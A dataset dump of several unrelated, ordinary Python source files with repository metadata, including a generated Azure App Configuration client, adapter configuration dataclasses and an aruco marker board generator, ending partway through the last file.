federatedscope/core/proto/__init__.py
|
alibaba/FederatedScope
|
fcf6d237624769ea094cfd68803901622f14fc23
|
[
"Apache-2.0"
] | 1
|
2022-03-28T13:52:17.000Z
|
2022-03-28T13:52:17.000Z
|
federatedscope/core/proto/__init__.py
|
alibaba/FederatedScope
|
fcf6d237624769ea094cfd68803901622f14fc23
|
[
"Apache-2.0"
] | null | null | null |
from federatedscope.core.proto.gRPC_comm_manager_pb2 import *
from federatedscope.core.proto.gRPC_comm_manager_pb2_grpc import *
| 43
| 66
| 0.875969
| 19
| 129
| 5.578947
| 0.473684
| 0.339623
| 0.415094
| 0.509434
| 0.849057
| 0.849057
| 0.849057
| 0.849057
| 0
| 0
| 0
| 0.016529
| 0.062016
| 129
| 2
| 67
| 64.5
| 0.859504
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
12a8182398011c90e7fe6569f807b5fc6cc416b7
| 22,756
|
py
|
Python
|
sdk/appconfiguration/azure-appconfiguration/azure/appconfiguration/_generated/operations/_configuration_client_operations.py
|
kushan2018/azure-sdk-for-python
|
08a9296207281f4e90e23cf7a30173863accc867
|
[
"MIT"
] | null | null | null |
sdk/appconfiguration/azure-appconfiguration/azure/appconfiguration/_generated/operations/_configuration_client_operations.py
|
kushan2018/azure-sdk-for-python
|
08a9296207281f4e90e23cf7a30173863accc867
|
[
"MIT"
] | 1
|
2020-03-06T05:57:16.000Z
|
2020-03-06T05:57:16.000Z
|
sdk/appconfiguration/azure-appconfiguration/azure/appconfiguration/_generated/operations/_configuration_client_operations.py
|
kushan2018/azure-sdk-for-python
|
08a9296207281f4e90e23cf7a30173863accc867
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError, map_error
from azure.core.paging import ItemPaged
from .. import models
import uuid
class ConfigurationClientOperationsMixin(object):
def list_configuration_settings(
self, label=None, key=None, accept_date_time=None, fields=None, cls=None, **kwargs):
"""List configuration settings.
List the configuration settings in the configuration store, optionally
filtered by label.
:param label: Filter returned values based on their label. '*' can be
used as wildcard in the beginning or end of the filter
:type label: list[str]
:param key: Filter returned values based on their keys. '*' can be
used as wildcard in the beginning or end of the filter
:type key: list[str]
:param accept_date_time: Obtain representation of the result related
to past time.
:type accept_date_time: datetime
:param fields: Specify which fields to return
:type fields: list[str]
:return: An iterator like instance of ConfigurationSetting
:rtype:
~azure.core.paging.ItemPaged[~appconfiguration.models.ConfigurationSetting]
:raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
"""
def prepare_request(next_link=None):
query_parameters = {}
if not next_link:
# Construct URL
url = self.list_configuration_settings.metadata['url']
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, '[str]', div=',', max_items=5)
if key is not None:
query_parameters['key'] = self._serialize.query("key", key, '[str]', div=',')
if fields is not None:
query_parameters['fields'] = self._serialize.query("fields", fields, '[str]', div=',')
else:
url = next_link
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self._config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if accept_date_time is not None:
header_parameters['Accept-DateTime'] = self._serialize.header("accept_date_time", accept_date_time, 'iso-8601')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(response):
deserialized = self._deserialize('ConfigurationSettingList', response)
return None, iter(deserialized.items)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request)
response = pipeline_response.http_response
error_map = kwargs.pop('error_map', None)
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return response
# Deserialize response
return ItemPaged(
get_next, extract_data
)
list_configuration_settings.metadata = {'url': '/kv'}
def get_configuration_setting(self, key, label="%00", accept_date_time=None, cls=None, **kwargs):
"""Get a ConfigurationSetting.
Get the ConfigurationSetting for the given key and label.
:param key: string
:type key: str
:param label: Label of key to retreive
:type label: str
:param accept_date_time: Obtain representation of the result related
to past time.
:type accept_date_time: datetime
:param callable cls: A custom type or function that will be passed the
direct response
:return: ConfigurationSetting or the result of cls(response)
:rtype: ~appconfiguration.models.ConfigurationSetting
:raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
"""
error_map = kwargs.pop('error_map', None)
# Construct URL
url = self.get_configuration_setting.metadata['url']
path_format_arguments = {
'key': self._serialize.url("key", key, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self._config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if accept_date_time is not None:
header_parameters['Accept-DateTime'] = self._serialize.header("accept_date_time", accept_date_time, 'iso-8601')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 304]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
header_dict = {}
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConfigurationSetting', response)
header_dict = {
'Last-Modified': self._deserialize('str', response.headers.get('Last-Modified')),
}
if cls:
return cls(response, deserialized, header_dict)
return deserialized
get_configuration_setting.metadata = {'url': '/kv/{key}'}
def create_or_update_configuration_setting(self, configuration_setting, key, label="%00", cls=None, **kwargs):
"""Create (or update) a ConfigurationSetting.
Create (or update) a ConfigurationSetting.
:param configuration_setting:
:type configuration_setting:
~appconfiguration.models.ConfigurationSetting
:param key: string
:type key: str
:param label:
:type label: str
:param callable cls: A custom type or function that will be passed the
direct response
:return: ConfigurationSetting or the result of cls(response)
:rtype: ~appconfiguration.models.ConfigurationSetting
:raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
"""
error_map = kwargs.pop('error_map', None)
# Construct URL
url = self.create_or_update_configuration_setting.metadata['url']
path_format_arguments = {
'key': self._serialize.url("key", key, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self._config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
# Construct body
body_content = self._serialize.body(configuration_setting, 'ConfigurationSetting')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConfigurationSetting', response)
if cls:
return cls(response, deserialized, None)
return deserialized
create_or_update_configuration_setting.metadata = {'url': '/kv/{key}'}
def delete_configuration_setting(self, key, label=None, cls=None, **kwargs):
"""Delete a ConfigurationSetting.
:param key: string
:type key: str
:param label:
:type label: str
:param callable cls: A custom type or function that will be passed the
direct response
:return: ConfigurationSetting or the result of cls(response)
:rtype: ~appconfiguration.models.ConfigurationSetting
:raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
"""
error_map = kwargs.pop('error_map', None)
# Construct URL
url = self.delete_configuration_setting.metadata['url']
path_format_arguments = {
'key': self._serialize.url("key", key, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self._config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConfigurationSetting', response)
if cls:
return cls(response, deserialized, None)
return deserialized
delete_configuration_setting.metadata = {'url': '/kv/{key}'}
def list_keys(
self, name=None, accept_date_time=None, cls=None, **kwargs):
"""
:param name:
:type name: str
:param accept_date_time: Obtain representation of the result related
to past time.
:type accept_date_time: datetime
:return: An iterator like instance of Key
:rtype: ~azure.core.paging.ItemPaged[~appconfiguration.models.Key]
:raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
"""
def prepare_request(next_link=None):
query_parameters = {}
if not next_link:
# Construct URL
url = self.list_keys.metadata['url']
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
else:
url = next_link
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self._config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if accept_date_time is not None:
header_parameters['Accept-DateTime'] = self._serialize.header("accept_date_time", accept_date_time, 'iso-8601')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(response):
deserialized = self._deserialize('KeyList', response)
return None, iter(deserialized.items)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request)
response = pipeline_response.http_response
error_map = kwargs.pop('error_map', None)
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return response
# Deserialize response
return ItemPaged(
get_next, extract_data
)
list_keys.metadata = {'url': '/keys'}
def list_labels(
self, accept_date_time=None, fields=None, name=None, cls=None, **kwargs):
"""List labels.
:param accept_date_time: Obtain representation of the result related
to past time.
:type accept_date_time: datetime
:param fields: Specify which fields to return
:type fields: list[str]
:param name:
:type name: str
:return: An iterator like instance of Label
:rtype: ~azure.core.paging.ItemPaged[~appconfiguration.models.Label]
:raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
"""
def prepare_request(next_link=None):
query_parameters = {}
if not next_link:
# Construct URL
url = self.list_labels.metadata['url']
if fields is not None:
query_parameters['fields'] = self._serialize.query("fields", fields, '[str]', div=',')
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
else:
url = next_link
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self._config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if accept_date_time is not None:
header_parameters['Accept-DateTime'] = self._serialize.header("accept_date_time", accept_date_time, 'iso-8601')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(response):
deserialized = self._deserialize('LabelList', response)
return None, iter(deserialized.items)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request)
response = pipeline_response.http_response
error_map = kwargs.pop('error_map', None)
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return response
# Deserialize response
return ItemPaged(
get_next, extract_data
)
list_labels.metadata = {'url': '/labels'}
def lock_configuration_setting(self, key, label=None, cls=None, **kwargs):
"""
:param key:
:type key: str
:param label:
:type label: str
:param callable cls: A custom type or function that will be passed the
direct response
:return: ConfigurationSetting or the result of cls(response)
:rtype: ~appconfiguration.models.ConfigurationSetting
:raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
"""
error_map = kwargs.pop('error_map', None)
# Construct URL
url = self.lock_configuration_setting.metadata['url']
path_format_arguments = {
'key': self._serialize.url("key", key, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self._config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConfigurationSetting', response)
if cls:
return cls(response, deserialized, None)
return deserialized
lock_configuration_setting.metadata = {'url': '/locks/{key}'}
def unlock_configuration_setting(self, key, label=None, cls=None, **kwargs):
"""
:param key:
:type key: str
:param label:
:type label: str
:param callable cls: A custom type or function that will be passed the
direct response
:return: ConfigurationSetting or the result of cls(response)
:rtype: ~appconfiguration.models.ConfigurationSetting
:raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
"""
error_map = kwargs.pop('error_map', None)
# Construct URL
url = self.unlock_configuration_setting.metadata['url']
path_format_arguments = {
'key': self._serialize.url("key", key, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self._config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConfigurationSetting', response)
if cls:
return cls(response, deserialized, None)
return deserialized
unlock_configuration_setting.metadata = {'url': '/locks/{key}'}
def list_revisions(
self, label=None, key=None, fields=None, accept_date_time=None, cls=None, **kwargs):
"""
:param label: Filter returned values based on their label. '*' can be
used as wildcard in the beginning or end of the filter
:type label: list[str]
:param key: Filter returned values based on their keys. '*' can be
used as wildcard in the beginning or end of the filter
:type key: list[str]
:param fields: Specify which fields to return
:type fields: list[str]
:param accept_date_time: Obtain representation of the result related
to past time.
:type accept_date_time: datetime
:return: An iterator like instance of ConfigurationSetting
:rtype:
~azure.core.paging.ItemPaged[~appconfiguration.models.ConfigurationSetting]
:raises: :class:`HttpResponseError<azure.core.HttpResponseError>`
"""
def prepare_request(next_link=None):
query_parameters = {}
if not next_link:
# Construct URL
url = self.list_revisions.metadata['url']
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, '[str]', div=',', max_items=5)
if key is not None:
query_parameters['key'] = self._serialize.query("key", key, '[str]', div=',')
if fields is not None:
query_parameters['fields'] = self._serialize.query("fields", fields, '[str]', div=',')
else:
url = next_link
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self._config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if accept_date_time is not None:
header_parameters['Accept-DateTime'] = self._serialize.header("accept_date_time", accept_date_time, 'iso-8601')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(response):
deserialized = self._deserialize('ConfigurationSettingList', response)
return None, iter(deserialized.items)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request)
response = pipeline_response.http_response
error_map = kwargs.pop('error_map', None)
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return response
# Deserialize response
return ItemPaged(
get_next, extract_data
)
list_revisions.metadata = {'url': '/revisions'}
| 41.299456
| 127
| 0.627922
| 2,448
| 22,756
| 5.643791
| 0.071895
| 0.048639
| 0.0304
| 0.014186
| 0.919079
| 0.895266
| 0.888752
| 0.860162
| 0.857701
| 0.848726
| 0
| 0.00513
| 0.271928
| 22,756
| 550
| 128
| 41.374545
| 0.828766
| 0.236421
| 0
| 0.802721
| 1
| 0
| 0.079756
| 0.015023
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.013605
| 0
| 0.176871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12d5c90612534b025b3d4ce25cccec9db67e488b
| 12
|
py
|
Python
|
HW1/test.py
|
JusperLee/Deep-Learning
|
47c5829502a8b35aee10a00de4579a7f6b2a6fa7
|
[
"Apache-2.0"
] | 7
|
2019-05-04T15:32:22.000Z
|
2020-03-24T03:52:31.000Z
|
HW1/test.py
|
JusperLee/Deep-Learning
|
47c5829502a8b35aee10a00de4579a7f6b2a6fa7
|
[
"Apache-2.0"
] | null | null | null |
HW1/test.py
|
JusperLee/Deep-Learning
|
47c5829502a8b35aee10a00de4579a7f6b2a6fa7
|
[
"Apache-2.0"
] | null | null | null |
print(2//18)
| 12
| 12
| 0.666667
| 3
| 12
| 2.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 12
| 1
| 12
| 12
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
42099c062f2b8751d42492acc8e021500da4db51
| 68
|
py
|
Python
|
l10n_ar_reports/models/__init__.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | 1
|
2021-01-25T15:57:58.000Z
|
2021-01-25T15:57:58.000Z
|
l10n_ar_reports/models/__init__.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | null | null | null |
l10n_ar_reports/models/__init__.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | 2
|
2020-10-17T16:36:02.000Z
|
2021-01-24T10:20:05.000Z
|
from . import account_vat_ledger
from . import account_vat_ledger_rg
| 34
| 35
| 0.867647
| 11
| 68
| 4.909091
| 0.545455
| 0.37037
| 0.62963
| 0.740741
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102941
| 68
| 2
| 35
| 34
| 0.885246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
4220cc29a54571b7a9733b333a6899a277027421
| 5,285
|
py
|
Python
|
CLIP-ViL/src/lxrt/adapters/config.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 41
|
2021-12-14T02:50:16.000Z
|
2022-03-30T07:41:19.000Z
|
CLIP-ViL/src/lxrt/adapters/config.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 1
|
2022-01-07T03:31:47.000Z
|
2022-03-25T00:31:53.000Z
|
CLIP-ViL/src/lxrt/adapters/config.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 2
|
2021-12-14T03:10:18.000Z
|
2022-03-29T04:59:23.000Z
|
from dataclasses import dataclass
@dataclass
class AdapterConfig(object):
"""Implements the adapter configuration proposed by Houlsby et. al, 2019
in https://arxiv.org/abs/1902.00751."""
add_layer_norm_before_adapter: bool = False
add_layer_norm_after_adapter: bool = False
non_linearity: str = "gelu_new"
reduction_factor: int = 16
weight_init_range = 1e-2
# Whether to use conditional layer norms for adapters.
conditional_layer_norm = False
hidden_dim = 128
# Whether to add adapter blocks, this is used in case we need
# to tune only layer norms.
train_adapters_blocks = True
task_adapter_layers_encoder = None
task_adapter_layers_decoder = None
task_adapter_in_decoder = True
intrinsic_dim = 100
normalize_intrinsic_projections = False
# This can be either random, or fastfood.
intrinsic_projection = "random"
# Hypercomplex adapters parameters
hypercomplex_adapters = False
hypercomplex_division = 8
learn_phm = True
hypercomplex_nonlinearity="glorot-uniform"
shared_phm_rule = False
factorized_phm = False
shared_W_phm = False
factorized_phm_rule = False
phm_c_init = "normal"
phm_rank = 1
phm_init_range=0.01
# prefix-tuning parameters.
prefix_dim = 100
init_prefix_from_vocab = False
kronecker_prod = False
# BitFit configuration.
bitfit = False
# Low-rank adapters.
low_rank_adapters = False
low_rank_w_init = "glorot-uniform"
low_rank_rank = 1
# whether using single adapter for all tasks
use_single_adapter = True
class MetaAdapterConfig(AdapterConfig):
"""Implements Meta adapter in which a hyper-network generates the parameters of
adapter layers. In this case we have a task embeddings which is feed to the
hyper-network to allow it generate the weights for the adapter layers."""
task_embedding_dim = 512
task_embedding_dir = None
hidden_dim = 128
train_task_embeddings = False
non_linearity: str = "gelu_new"
projected_task_embedding_dim = 64
task_hidden_dim = 128
parametric_task_embedding = False
# If Specified, uses one hypernet to generates the adapters weights.
unique_hyper_net = True
unique_hyper_net_layer_norm = True
# We consider only one hyper-net for all the blocks of transformer.
efficient_unique_hyper_net = False
task_to_embeddings=None
@dataclass
class CompactorConfig(object):
add_layer_norm_before_adapter: bool = False
add_layer_norm_after_adapter: bool = False
non_linearity: str = "gelu_new"
reduction_factor: int = 16
weight_init_range = 1e-2
# Whether to use conditional layer norms for adapters.
hidden_dim = 128
# Whether to add adapter blocks, this is used in case we need
# to tune only layer norms.
task_adapter_layers_encoder = None
task_adapter_layers_decoder = None
task_adapter_in_decoder = True
intrinsic_dim = 100
normalize_intrinsic_projections = False
# This can be either random, or fastfood.
intrinsic_projection = "random"
# Hypercomplex adapters parameters
hypercomplex_adapters = True
hypercomplex_division = 4
train_task_adapters = True
learn_phm = True
hypercomplex_nonlinearity="glorot-uniform"
shared_phm_rule = True
factorized_phm = True
shared_W_phm = False
factorized_phm_rule = False
phm_c_init = "normal"
phm_rank = 1
phm_init_range=0.0001
# prefix-tuning parameters.
prefix_dim = 100
init_prefix_from_vocab = False
kronecker_prod = False
# BitFit configuration.
bitfit = False
# Low-rank adapters.
low_rank_adapters = False
low_rank_w_init = "glorot-uniform"
low_rank_rank = 1
# whether using single adapter for all tasks
use_single_adapter = False
@dataclass
class LRAdapterConfig(object):
add_layer_norm_before_adapter: bool = False
add_layer_norm_after_adapter: bool = False
non_linearity: str = "gelu_new"
reduction_factor: int = 16
weight_init_range = 1e-2
# Whether to use conditional layer norms for adapters.
hidden_dim = 128
# Whether to add adapter blocks, this is used in case we need
# to tune only layer norms.
task_adapter_layers_encoder = None
task_adapter_layers_decoder = None
task_adapter_in_decoder = True
intrinsic_dim = 100
normalize_intrinsic_projections = False
# This can be either random, or fastfood.
intrinsic_projection = "random"
# Hypercomplex adapters parameters
hypercomplex_adapters = False
hypercomplex_division = 4
train_task_adapters = True
learn_phm = True
hypercomplex_nonlinearity="glorot-uniform"
shared_phm_rule = True
factorized_phm = True
shared_W_phm = False
factorized_phm_rule = False
phm_c_init = "normal"
phm_rank = 1
phm_init_range=0.0001
# prefix-tuning parameters.
prefix_dim = 100
init_prefix_from_vocab = False
kronecker_prod = False
# BitFit configuration.
bitfit = False
# Low-rank adapters.
low_rank_adapters = True
low_rank_w_init = "glorot-uniform"
low_rank_rank = 1
# whether using single adapter for all tasks
use_single_adapter = False
| 30.2
| 83
| 0.721476
| 696
| 5,285
| 5.182471
| 0.211207
| 0.023288
| 0.019961
| 0.022179
| 0.763793
| 0.763793
| 0.756307
| 0.756307
| 0.756307
| 0.756307
| 0
| 0.020818
| 0.227436
| 5,285
| 175
| 84
| 30.2
| 0.862601
| 0.271145
| 0
| 0.794872
| 0
| 0
| 0.04
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008547
| 0
| 0.974359
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
42537388ec7e03f73a9b2449d5cac52c2ab7a6d0
| 31
|
py
|
Python
|
src/bugu_bot/__init__.py
|
Sclock/bugu_bot
|
e2c4a7844b3f162d6a5d229c19be7deda5b251b5
|
[
"MIT"
] | null | null | null |
src/bugu_bot/__init__.py
|
Sclock/bugu_bot
|
e2c4a7844b3f162d6a5d229c19be7deda5b251b5
|
[
"MIT"
] | null | null | null |
src/bugu_bot/__init__.py
|
Sclock/bugu_bot
|
e2c4a7844b3f162d6a5d229c19be7deda5b251b5
|
[
"MIT"
] | 1
|
2021-08-31T14:07:41.000Z
|
2021-08-31T14:07:41.000Z
|
from .bugu_bot import bugu_bot
| 15.5
| 30
| 0.83871
| 6
| 31
| 4
| 0.666667
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 1
| 31
| 31
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4254231b38c7aa31b3d05cc1ca5f311ba550e884
| 12,138
|
py
|
Python
|
vision/rgb_camera/makeboard.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 23
|
2021-04-02T09:02:04.000Z
|
2022-03-22T05:31:03.000Z
|
vision/rgb_camera/makeboard.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 35
|
2021-04-12T09:41:05.000Z
|
2022-03-26T13:32:46.000Z
|
vision/rgb_camera/makeboard.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 16
|
2021-03-30T11:55:45.000Z
|
2022-03-30T07:10:59.000Z
|
import numpy as np
from PIL import Image
from cv2 import aruco
def makearucoboard(nrow, ncolumn, markerdict=aruco.DICT_6X6_250, startid = 0, markersize=25, savepath='./', name='test',
paperwidth=210, paperheight=297, dpi = 600, framesize = None):
"""
create aruco board
the paper is in portrait orientation, nrow means the number of markers in the vertical direction
:param nrow:
:param ncolumn:
:param startid: the starting id of the marker
:param markerdict:
:param markersize:
:param savepath:
:param name: the name of the saved pdf file
:param paperwidth: mm
:param paperheight: mm
:param dpi:
:param framesize: (width, height) the 1pt frame for easy cut, nothing is drawn by default
:return:
author: weiwei
date: 20190420
"""
aruco_dict = aruco.Dictionary_get(markerdict)
# 1mm = 0.0393701inch
a4npxrow = int(paperheight*0.0393701*dpi)
a4npxcolumn = int(paperwidth*0.0393701*dpi)
bgimg = np.ones((a4npxrow, a4npxcolumn), dtype='uint8')*255
markersizepx = int(markersize*0.0393701*dpi)
markerdist = int(markersizepx/4)
if framesize is not None:
framesize[0] = int(framesize[0]*0.0393701*dpi)
framesize[1] = int(framesize[1]*0.0393701*dpi)
if a4npxcolumn<framesize[0]+2:
print("Frame width must be smaller than the #pt in each row.")
if a4npxrow<framesize[1]+2:
print("Frame height must be smaller than the #pt in each column.")
framelft = int((a4npxcolumn-framesize[0])/2-1)
framergt = int(framelft+1+framesize[0])
frametop = int((a4npxrow-framesize[1])/2-1)
framedown = int(frametop+1+framesize[1])
bgimg[frametop:framedown+1, framelft:framelft+1]=0
bgimg[frametop:framedown+1, framergt:framergt+1]=0
bgimg[frametop:frametop+1, framelft:framergt+1]=0
bgimg[framedown:framedown+1, framelft:framergt+1]=0
markerareanpxrow = (nrow-1)*(markerdist)+nrow*markersizepx
uppermargin = int((a4npxrow-markerareanpxrow)/2)
markerareanpxcolumn = (ncolumn-1)*(markerdist)+ncolumn*markersizepx
leftmargin = int((a4npxcolumn-markerareanpxcolumn)/2)
if (uppermargin <= 10) or (leftmargin <= 10):
print("Too many markers! Reduce nrow and ncolumn.")
return
for idnr in range(nrow):
for idnc in range(ncolumn):
startrow = uppermargin+idnr*(markersizepx+markerdist)
endrow = startrow+markersizepx
startcolumn = leftmargin+idnc*(markersizepx+markerdist)
endcolumn = markersizepx+startcolumn
i = startid+idnr*ncolumn+idnc
img = aruco.drawMarker(aruco_dict,i,markersizepx)
bgimg[startrow:endrow, startcolumn:endcolumn] = img
im = Image.fromarray(bgimg).convert("L")
